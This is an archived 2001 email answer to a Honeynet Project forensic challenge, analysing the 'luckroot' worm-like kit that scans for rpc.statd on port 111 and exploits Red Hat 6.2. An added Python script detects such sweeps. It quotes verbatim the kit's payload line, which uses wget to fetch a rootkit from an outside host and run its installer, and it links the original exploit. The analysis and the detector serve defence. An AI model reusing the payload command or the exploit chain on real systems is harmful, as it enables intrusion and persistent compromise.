From chuckers@gol.com Sat Mar 17 20:03:25 2001
Date: Fri, 16 Mar 2001 20:37:17 +0900
From: Chuck Douglas
To: project@honeynet.org
Subject: Scan of the Month 13

The questions for Scan 13 are best answered in a slightly different order than presented. First, let's take a look at how the tool works.

The tool consists of 3 main pieces:

    luckgo       /* executable shell script */
    luckscan-a   /* C-Programme */
    luckstatdx   /* C-Programme */

luckgo performs most of the mindless grunt work for this tool. It requires at least one argument, which represents the first byte of the network number. It will accept up to 3 arguments, which will scan up to a class C network. The luckgo script then checks for the existence of the luckscan-a and luckstatdx programmes. If it doesn't find them, it will use gcc to compile the provided source code into these required programmes. This is one of the reasons that compilers should not be kept on production machines: tools hackers can't bring with them can be created with minimal fuss.

luckgo then makes a call to the luckscan-a programme. luckscan-a requires at least 2 arguments: the network number to scan and the port to scan. It will optionally take up to 4 arguments, with the other 2 representing further network numbers. The luckgo script passes a predefined port of 111 (Sun RPC) as well as the network number(s) it received when called. luckscan-a then proceeds to loop through and attempt to connect to all IP addresses on port 111, starting from the arguments that were passed to it. If it finds a machine that has port 111 open, it will then make a call to luckstatdx and then continue on scanning all valid IP addresses, looking for port 111.

NOTE: luckscan-a is generically written so that it can easily be made to scan and attack ANY port.
Again, port 111 comes from a predefined call in the luckgo script.

luckstatdx is the main cracking tool for this kit. It is another generically written programme that can be used for a variety of attacks. It contains shell code for x86 machines that gives a root shell on port 39168. It accepts a number of parameters that vary depending on what you want to attack and where you are directing that attack. When called from the luckscan-a programme, it is passed parameters to automatically go after the Redhat 6.2 nfs-utils exploit. luckstatdx attempts to run exploit code on a given IP address (already determined to have the rpc.statd port open by luckscan-a) and, if successful, opens a connection to a machine called www.becys.org, downloads a file called xzibit.tar.gz, and expands and extracts the file. It connects to the created directory, runs an install programme, and then deletes the created directory as well as the downloaded file. Presumably this is some other rootkit that allows the user to keep access to a cracked machine.

That covers how the tool works. Returning to the other questions.

The blackhat is attempting to find numerous machines to break into. There are a couple of typing mistakes, but the blackhat seems to have a clue about what s/he is doing. Their reactions to mistakes don't appear to be panicked, and the mistakes are oftentimes slips of the fingers. After having gained access to the honeypot, the blackhat attempts to hide the luckroot tool in /usr/sbin/.mail and download the LUCKROOT.TAR file from their home base. After a few misattempts at getting it open, s/he begins scanning a number of networks:

    216.210.0.0
    200.120.0.0
    64.120.0.0
    216.200.0.0   /* initially a typo */
    200.120.0.0   /* ??? this one is already in the list */
    63.1.0.0
    216.10.0.0
    210.120.0.0
    64.1.0.0
    216.1.0.0
    194.1.0.0
    216.1.0.0
    210.128.0.0
    24.1.0.0
    12.20.0.0

These appear to be somewhat random and not directed against any individual.
With the large number of networks, the blackhat just needs to be patient and lucky. There is probably a good chance that a machine will be cracked.

The tool could probably be classified as a worm. Once released, it does its scans and attempts to break in and presumably install rootkits on various machines for later use with little or no intervention from the operator. It supposedly runs all commands in the background, so it would be a simple matter of pointing it at a whole lot of networks and waiting.

The tool, however, is not original. luckstatdx is based on statdx by ron1n (shellcode@hotmail.com) and can be found at:

    http://packetstorm.securify.com/0008-exploits/statdx.c

The main modification (with the exception of a few output strings here and there) is in runshell(), which contains the line to (presumably) rootkit a newly cracked machine:

    send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);

The blackhat was kind enough to even comment the fact that s/he had made changes to the code.

I am fairly certain I have seen code very similar to luckscan-a, which simply searches for rpc.statd exploits. Unfortunately, I can't seem to find the exact code for it at the moment. Modifications presumably include turning a simple scanner into a scanner/cracker.

For the bonus question: the creator is possibly Romanian, or at least a Romanian speaker. This is based on the comment line

    // Aici cred ca trebuie un exit

in the runshell() function in luckstatdx.c. The only way I figured out this was Romanian was by doing a search on http://www.yahoo.com/ for that sentence, which returned a lot of sites in the .RO domain. Checking an online Romanian-English dictionary, this appears to mean something along the lines of "It would probably be better to add an exit from now on."
However, I am not a Romanian speaker, so I can't comment on whether the sentence is grammatical, nor even on whether my translation is approaching correct. For that matter, it could be something that the creator/user saw in some other code or website somewhere and doesn't have any idea what it really means.

The creator apparently knows more than enough to be dangerous, though. Yes, it is scripted, but it is tweaked enough to be a cut above download-only script kiddies.

-- 
Chuck (茶気) Douglas -- chuckers@gol.com
"I don't pretend I have all the answers/Just the obvious ones" -- _Backbone_ by Baby Animals
Homepage down until further notice.
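The submission above describes luckgo turning one to three octets into a network range and luckscan-a walking that range address by address on 111/tcp. The following is an added example, not part of the submission and not code from the luckroot kit: it computes the footprint a luckgo invocation implies (assuming, from the write-up, that one octet means a /8, two a /16 and three a /24) and runs sweep detection over constructed iptables-style log lines to flag a host that is walking port 111 sequentially, which is what the honeypot's own outbound logs would show once luckgo was started. The log format, the source addresses and the threshold of 8 hosts are assumptions.

```python
import ipaddress
import re
from collections import defaultdict


def sweep_network(*octets):
    """Network luckgo would hand to luckscan-a for the given leading octets.
    Assumption taken from the write-up: 1 octet -> /8, 2 -> /16, 3 -> /24."""
    if not 1 <= len(octets) <= 3:
        raise ValueError("luckgo accepts one to three octets")
    quad = [int(o) for o in octets] + [0] * (4 - len(octets))
    return ipaddress.ip_network(".".join(map(str, quad)) + f"/{8 * len(octets)}")


def covering_network(lo, hi):
    """Smallest CIDR block containing both integer addresses lo and hi."""
    net = ipaddress.ip_network(f"{ipaddress.ip_address(lo)}/32")
    while ipaddress.ip_address(hi) not in net:
        net = net.supernet()
    return net


# iptables-style syslog lines are assumed; only SRC, DST and DPT are consumed.
LOG_RE = re.compile(r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?DPT=(?P<dpt>\d+)")


def detect_rpc_sweeps(lines, port=111, min_hosts=8):
    """Flag sources that tried `port` on at least min_hosts distinct hosts.

    Returns {src: {"hosts": n, "sequential": share of +1 address steps,
    "network": covering CIDR}}. A sequential share near 1.0 is the
    signature of a scanner walking a range one address at a time."""
    per_src = defaultdict(set)
    for line in lines:
        m = LOG_RE.search(line)
        if m and int(m.group("dpt")) == port:
            per_src[m.group("src")].add(int(ipaddress.ip_address(m.group("dst"))))

    findings = {}
    for src, dsts in per_src.items():
        if len(dsts) < min_hosts:
            continue
        ordered = sorted(dsts)
        steps = [b - a for a, b in zip(ordered, ordered[1:])]
        findings[src] = {
            "hosts": len(ordered),
            "sequential": (sum(1 for s in steps if s == 1) / len(steps)) if steps else 0.0,
            "network": str(covering_network(ordered[0], ordered[-1])),
        }
    return findings


# Constructed sample: 10.0.0.5 walking 216.210.0.1 through .12 on 111/tcp,
# plus unrelated traffic that must not be flagged (one ssh attempt from the
# same host, and a second host with a single hit on 111).
SAMPLE_LOG = [
    f"Mar 16 20:37:{i:02d} honeypot kernel: IN= OUT=eth0 SRC=10.0.0.5 "
    f"DST=216.210.0.{i} PROTO=TCP SPT={1024 + i} DPT=111 SYN"
    for i in range(1, 13)
] + [
    "Mar 16 20:38:01 honeypot kernel: IN= OUT=eth0 SRC=10.0.0.5 DST=64.120.3.9 PROTO=TCP SPT=1100 DPT=22 SYN",
    "Mar 16 20:38:02 honeypot kernel: IN= OUT=eth0 SRC=10.0.0.7 DST=216.210.0.3 PROTO=TCP SPT=2000 DPT=80 SYN",
    "Mar 16 20:38:03 honeypot kernel: IN= OUT=eth0 SRC=10.0.0.7 DST=216.210.0.4 PROTO=TCP SPT=2001 DPT=111 SYN",
]

if __name__ == "__main__":
    net = sweep_network(216, 210)  # what "luckgo 216 210" would cover
    print(f"luckgo 216 210 sweeps {net} ({net.num_addresses} addresses)")
    for src, info in detect_rpc_sweeps(SAMPLE_LOG).items():
        print(f"{src}: {info['hosts']} hosts on 111/tcp, "
              f"{info['sequential']:.0%} sequential, within {info['network']}")
```

Run against the honeypot's outbound connection log, the covering network of each finding can be compared with the list of networks the blackhat typed; a /16 footprint with a sequential share near 1.0 is consistent with luckscan-a, whereas a scattered set of destinations on 111/tcp points at something else.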